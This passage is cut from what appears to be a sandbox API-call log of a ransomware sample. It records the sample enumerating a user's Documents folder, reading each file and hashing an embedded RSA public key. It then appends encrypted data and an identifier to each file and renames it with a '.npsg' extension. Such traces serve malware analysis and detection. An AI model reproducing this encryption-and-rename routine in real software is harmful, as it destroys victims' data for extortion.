szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.799] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.799] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.799] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.799] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.799] GetLastError () returned 0x0 [0236.799] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.799] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.799] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.799] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.799] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd4d0) returned 0x3b95d50 [0236.799] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95818 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002f0 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95860 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400308 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400338 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400398 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400350 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0236.800] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b81cd0 [0236.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400338 | out: hHeap=0x620000) returned 1 [0236.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400350 | out: hHeap=0x620000) returned 1 [0236.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400398 | out: hHeap=0x620000) returned 1 [0236.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400398 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400350 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400338 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0236.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0236.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400350 | out: hHeap=0x620000) returned 1 [0236.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400338 | out: hHeap=0x620000) returned 1 [0236.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400398 | out: hHeap=0x620000) returned 1 [0236.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.801] GetCurrentThreadId () returned 0x5b4 [0236.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b794f8 [0236.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0236.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.801] GetCurrentThreadId () returned 0x5b4 [0236.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4dd8 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400398 [0236.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400338 [0236.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0236.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400350 [0236.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400320 [0236.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34003b0 [0236.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400380 [0236.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400368 [0236.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34003c8 [0236.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400368 | out: hHeap=0x620000) returned 1 [0236.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400368 [0236.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400380 | out: hHeap=0x620000) returned 1 [0236.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400338 | out: hHeap=0x620000) returned 1 [0236.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400338 [0236.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0236.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400398 | out: hHeap=0x620000) returned 1 [0236.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0236.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003c8 | out: hHeap=0x620000) returned 1 [0236.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0236.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0236.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400338 | out: hHeap=0x620000) returned 1 [0236.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b947f8 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400368 | out: hHeap=0x620000) returned 1 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003b0 | out: hHeap=0x620000) returned 1 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400350 | out: hHeap=0x620000) returned 1 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400320 | out: hHeap=0x620000) returned 1 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0236.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400308 | out: hHeap=0x620000) returned 1 [0236.805] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xd4ca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.805] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.805] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.805] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.805] CloseHandle (hObject=0x644) returned 1 [0236.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0236.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b81cd0 [0236.806] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SAsKqjMtaP8ZXgThhx.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\saskqjmtap8zxgthhx.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SAsKqjMtaP8ZXgThhx.docx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\saskqjmtap8zxgthhx.docx.npsg")) returned 1 [0236.808] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa739a030, ftCreationTime.dwHighDateTime=0x1d5b69d, ftLastAccessTime.dwLowDateTime=0x9a7ad7b0, ftLastAccessTime.dwHighDateTime=0x1d5c38b, ftLastWriteTime.dwLowDateTime=0x9a7ad7b0, ftLastWriteTime.dwHighDateTime=0x1d5c38b, nFileSizeHigh=0x0, nFileSizeLow=0xb350, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uuejZ.pdf", cAlternateFileName="")) returned 1 [0236.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0236.808] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uuejZ.pdf") returned=".pdf" [0236.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uuejZ.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uuejz.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.808] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=45904) returned 1 [0236.808] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.810] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xb32a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.810] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.812] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xb350, lpOverlapped=0x0) returned 1 [0236.813] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.813] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.813] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.813] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.814] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.814] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.814] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.814] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.814] GetLastError () returned 0x0 [0236.814] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.814] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.814] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.814] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.814] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.815] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8d028 [0236.815] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xb350, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.815] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.815] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.815] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.815] CloseHandle (hObject=0x644) returned 1 [0236.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0236.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x3b81cd0 [0236.817] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uuejZ.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uuejz.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uuejZ.pdf.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uuejz.pdf.npsg")) returned 1 [0236.818] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: 